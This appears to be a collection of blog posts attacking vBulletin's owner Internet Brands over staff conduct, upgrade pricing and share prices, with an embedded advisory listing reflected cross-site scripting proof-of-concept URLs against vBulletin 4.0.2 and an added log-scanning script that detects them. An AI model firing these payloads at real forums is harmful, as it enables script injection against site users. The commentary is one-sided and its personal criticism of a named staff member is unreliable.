vBulletin Staff – Behind the Curtains

First, let me start by saying a big thank you to Internet Brands, and the staff at vBulletin. Thank you for not making me regret my decision to ditch vBulletin, for the far superior XenForo. Thank you for continuing in the downwards spiral that you have been going in, one which will ultimately lead to your demise.

It has been some time since I last visited vBulletin forums. Still having an active vBulletin license, I do like to frequent the forums from time to time to read about the latest happenings, but in truth mostly to get a good chuckle out of the mess vBulletin has become. Recently, I was browsing the “Licensed Customer Feedback” forum and a thread caught my attention and actually shocked me. This forum is a private forum only accessible to current licensed members of vBulletin, and is not visible to the public, which is most certainly a good thing for Internet Brands because it allows them to hide and censor the reality of the debacle that is now vBulletin.

Recently, a new staff member joined the team – Lawrence Cole. Here I was thinking it couldn’t possibly get any worse for vB, then they surprise me yet again by hiring this 34-year-old man who behaves like a child. Having read many of his posts in the private forums, it was apparent that he is completely unprofessional and has no respect for the customers. He engages in cheap tactics and resorts to name-calling, belittling and being all-out rude to customers. His excuse and justification was essentially (paraphrasing) “if you attack me, I’ll attack you.” I think he fails to understand that he is a staff member, one who should be focusing on CSR and not engaging in picking fights with customers. Do any of the other staff members come in to support the customers? No, why would they actually care about the concerns customers have? Instead they let the thread, and the bashing by the staff member, continue until he decides to close the thread.

Don’t take my word for it, have a look at what happens behind the closed doors, if only the public knew just how bad it was in this private forum.

In sum, there is no excuse for someone in his position to be behaving this way towards paying customers. Even if other customers were “attacking” him, the solution is not to retaliate in this manner; as a customer I would expect them to approach it in a professional, courteous manner…then again this is vBulletin and it seems that ship sailed long ago.

Internet Brands, enjoy the customers you have, it’s only a matter of time before the remaining ones you have follow the rest of us and move on from vBulletin to bigger and better things. The primary reason you are even able to get new customers is because you censor any signs of conflict in the public forums, and allow it to go on in the private forums that new members (and potentially new customers) have no knowledge of. This ruse is a temporary solution, and since you will do nothing for an actual solution, it will be just that – temporary. Enjoy it while it lasts.

Security Alert: Multiple XSS Vulnerabilities in Internet Brands’s vBulletin 4 Forum and vBulletin 4 Suite

Vendor: Internet Brands (NASDAQ: INET)
Product: vBulletin 4 Forum, vBulletin 4 Suite
Version: 4.0.2
Vector of Attack: Cross Site Scripting
Source: Inje3ct0rvBulletin.com

Details:

# Exploit  :
http://127.0.0.1/upload/calendar.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/faq.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forum.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/usercp.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/subscription.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/showgroups.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/sendmessage.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/search.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/register.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/profile.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/private.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/online.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/newthread.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/misc.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/memberlist.php?=>”‘><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/member.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/inlinemod.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/index.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/forumdisplay.php?acuparam=>”><ScRiPt>alert(213771818860)</ScRiPt>
Additional vulnerabilities found by vBulletin Forum Members
http://127.0.0.1/upload/content.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
http://127.0.0.1/upload/blog.php/>”><ScRiPt>alert(213771818860)</ScRiPt>
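
The URLs above come in two request shapes: markup placed in an arbitrary query parameter (acuparam) and markup appended as path info after the .php script name. As an added example (not part of the original advisory), this Python sketch flags both shapes in web-server access logs; the log lines, function names and the tag heuristic are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Heuristic (assumption): an HTML tag opening such as <script or </a.
TAG = re.compile(r"<\s*/?\s*[a-z]", re.I)
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PATH_INFO = re.compile(r"\.php(/.*)$", re.I)  # anything after script.php/
SCRIPT = re.compile(r"[^/]+\.php", re.I)

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %3C and %253C both become '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return 'path_info', 'query' or None for one request target."""
    parts = urlsplit(target)
    extra = PATH_INFO.search(parts.path)
    if extra and TAG.search(fully_decode(extra.group(1))):
        return "path_info"
    if TAG.search(fully_decode(parts.query)):
        return "query"
    return None

def scan(log_lines):
    """Return (line_number, kind, script) for each suspicious request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        request = REQUEST.search(line)
        kind = classify(request.group(1)) if request else None
        if kind:
            script = SCRIPT.search(urlsplit(request.group(1)).path)
            hits.append((number, kind, script.group(0) if script else "-"))
    return hits

# Constructed sample log lines (documentation addresses, made-up timestamps).
PAYLOAD = "%3E%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E"
STAMP = "- - [01/Mar/2010:10:00:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 {STAMP} "GET /upload/showthread.php?t=1234 HTTP/1.1" 200 5120',
    f'203.0.113.7 {STAMP} "GET /upload/faq.php?acuparam={PAYLOAD} HTTP/1.1" 200 4096',
    f'203.0.113.7 {STAMP} "GET /upload/usercp.php/{PAYLOAD} HTTP/1.1" 200 4096',
    f'203.0.113.7 {STAMP} "GET /upload/forum.php?acuparam=%253CsCrIpT%253Ealert(1) HTTP/1.1" 200 4096',
    f'192.0.2.10 {STAMP} "GET /upload/index.php/forum/general HTTP/1.1" 200 2048',
]
```

Calling scan(SAMPLE_LOG) reports lines 2 to 4 and leaves the ordinary thread view and the benign path-info request alone; a hit means the request was attempted, not that the response reflected it.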

The Real Faces Behind Internet Brands

Highway Robbery

I was tutoring this weekend and I helped an 11th grade high school student with US History.  He pointed out to me that history is useless, but I retorted that if we never learn from history, history has a tendency to repeat itself. That gave me reason to pause as I thought how that very logic applies to our scenario. Internet Brands did this once to us, what’s not to say they will do it again?

Let’s face the truth. I got my credit card bill last week, and it’s simply highway robbery. I cringed at the fact I had to pay just to do an upgrade. Sure $130.00 doesn’t seem much, but when you combine the fact that our license was supposed to be worth $160.00 (or $180.00 for others), we’re still paying more than $235.00 for a brand new license! What Internet Brands is making us pay is simply highway robbery. I don’t know how else to put it.

I don’t see ANY reason at all to justify existing license holders paying more. Essentially we’re being told to just pony up money for a brand new license. Forget what Internet Brands has told you; it’s merely a ploy, a cover. It’s purely marketing. Rip off all the marketing, and what you’ll see is that we’re paying for a brand new license.

As existing Legacy vBulletin license holders, we’re treated as second rate citizens. We’re not important to them. Our wallets are more important to them. What’s not to say this is to happen again when vBulletin 5 arrives on the horizon?

We’re stuck holding a useless, absolutely pointless vBulletin 3 license. After our license expires per-se, no more updates. No more security patches. Once vBulletin 4 goes into full swing, vBulletin 3 citizens are treated as the scorn of the earth. Internet Brands manipulated us using fear tactics so that we’d buy licenses.

I really sympathize with those who bought vBulletin licenses really late in the game before vBulletin 4 was announced. Anyone who bought a license merely hours or days before vBulletin 4 got announced feels the real wrath. They bought a license only to have it invalidated and ripped from their hands minutes later.

Yet when they protest that they’ve been scammed, they’re told to upgrade to the latest vBulletin 4 License by paying even more? Any more protests, and you have threads closed. Has anyone checked out Pre-Sales recently? There are several threads in which customers point out that they don’t treat customers well.

Has anyone at Internet Brands done the math? We’re paying MORE for upgrading to a vBulletin 4 license than brand new vBulletin 4 license holders. Where’s the justice? Where’s the respect? More importantly, where’s the loyalty to your existing customer base that made vBulletin so successful? If they’re treating customers like this, as a shareholder, stakeholder or investor I’d wonder how Internet Brands may very well treat me in the future.

Let’s face it. vBulletin 3 license holders have been screwed over. If history has anything to say, it’s that it’s going to happen again.

IB shares plummet

Today marked a gloomy event for investors in IB.

IB currently does not pay dividends to its investors, and their low share pricing is an obvious reflection of the distasteful reactions of vBulletin Customers.

deuterium (formerly ct2k7), as we gather, posted in our infamous Licensed Customer Feedback section, you know… the hidden from potential customer … area, in the thread pertaining to the original article by The Register about the share falling.

Floris replied moments later, referring to deuterium by his first name, explaining that this was common (or realistic) with the release of the Q3 2009 financial results.

In some cases this was true, but obviously, a drop of nearly 12% was something out of the ordinary. It was nearly enough to warrant its little space on Yahoo!’s Biggest Losers page.

Those using the Google finance page to track the shares will have noticed the amount of publicity Internet Brands is gaining from its treatment of its customers, something which is personally thought to be a major role in this, as investors see what’s going on behind closed doors.

So where IS James?

Ever since Internet Brands bought Jelsoft Enterprises Ltd in 2007, the activity of James has been dwindling. James has not posted or even logged into the vBulletin forums (no last activity recorded) since January of this year. In April of this year, one member sifted through some documents from the Companies House, suggesting that James had quit his role. vBulletin Staff insisted that James “was very much with us” prior to closing the thread.

Right now, the support staff are bearing the backlash from the customers, but where is James? Is it true that he has retired completely from Jelsoft?

There are many questions unanswered, and Internet Brands wants them to remain unanswered.